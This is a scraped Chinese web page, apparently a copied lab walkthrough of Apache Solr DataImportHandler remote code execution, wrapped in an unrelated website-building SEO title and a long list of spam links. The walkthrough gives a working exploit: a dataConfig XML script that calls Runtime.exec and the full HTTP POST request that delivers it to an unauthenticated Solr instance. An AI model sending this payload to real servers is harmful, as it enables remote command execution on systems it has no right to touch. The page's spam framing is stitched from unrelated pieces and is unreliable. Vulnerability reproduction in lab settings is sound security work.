当前位置: 首页 > news >正文

云南安宁做网站的公司北京网站建设亿玛酷专注4

云南安宁做网站的公司,北京网站建设亿玛酷专注4,网站首页优化公司,做免费网站推广开头语Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能&#…

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

访问`http://your-ip:8983/`即可查看到Apache solr的管理页面,无需登录。

1.首先在页面左侧选择`demo`核心,打开Dataimport面板,开启右侧Debug mode,填入以下POC:

<dataConfig><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");}]]></script><document><entity name="sample"fileName=".*"baseDir="/"processor="FileListEntityProcessor"recursive="false"transformer="script:poc" /></document>
</dataConfig>

2.利用burpsuite发送以下请求包:

POST /solr/demo/dataimport?_=1708782956647&indent=on&wt=json HTTP/1.1
Host: your-ip:8983
Content-Length: 613
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-type: application/x-www-form-urlencoded
Origin: http://your-ip:8983
Referer: http://your-ip:8983/solr/
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Connection: closecommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=demo&dataConfig=%3CdataConfig%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22sample%22%0A++++++++++++fileName%3D%22.*%22%0A++++++++++++baseDir%3D%22%2F%22%0A++++++++++++processor%3D%22FileListEntityProcessor%22%0A++++++++++++recursive%3D%22false%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

3.命令成功执行

http://www.yayakq.cn/news/23705/

相关文章:

  • 线上推广的渠道有哪些江门seo外包公司
  • 属于网络营销的特点是wordpress 优化
  • 网站设计怎么做才好看优化外包哪里好
  • 一个服务器可以做两个网站吗网站管理系统源码
  • 佛山营销网站建设多少钱专门做儿童的店铺网站
  • 哪里有做网站的英文外链代发
  • 许昌网站建设大连优化网站课程
  • 网站后台密码在哪个文件致力于网站开发维护学什么专业
  • 网站图片修改网站自建设需要买什么
  • ps怎样做网站大图网站首页图片切换
  • 电子商务网站建设功能网站备案查询网站
  • 网站模板无忧香水网站建设规划书
  • 一起做英语网站做u盘的老外网站
  • 深圳网站建设 百度一下seo培训讲师招聘
  • vivo官网网站服务sem 优化价格
  • 做公众号可以看的网站网站报备查询
  • 成都网站建设scjsc888知名企业破产
  • 滨海做网站找哪家好wordpress外网ip访问
  • 兰州优化网站推广辽宁建设工程招标网站
  • 佛山网站建设十年乐云seo金融网站排名优化
  • 怎么自己创建一个网站手机域名解析后怎么建网站
  • 建设网站的多少钱云主机可以放几个网站
  • wap网站快速开发都匀市网站建设
  • 建立主题网站的顺序一般是网站备案营业执照
  • 产品推广网站设计网站升级的内容包括哪些
  • 如何做网站给女朋友网站的规划与创建
  • 外贸怎么做公司网站关于网站建设工作的通报
  • dede网站图标用python开发网站
  • hexo框架做网站重庆的网站建设公司
  • 网站安全检测官网长沙租房网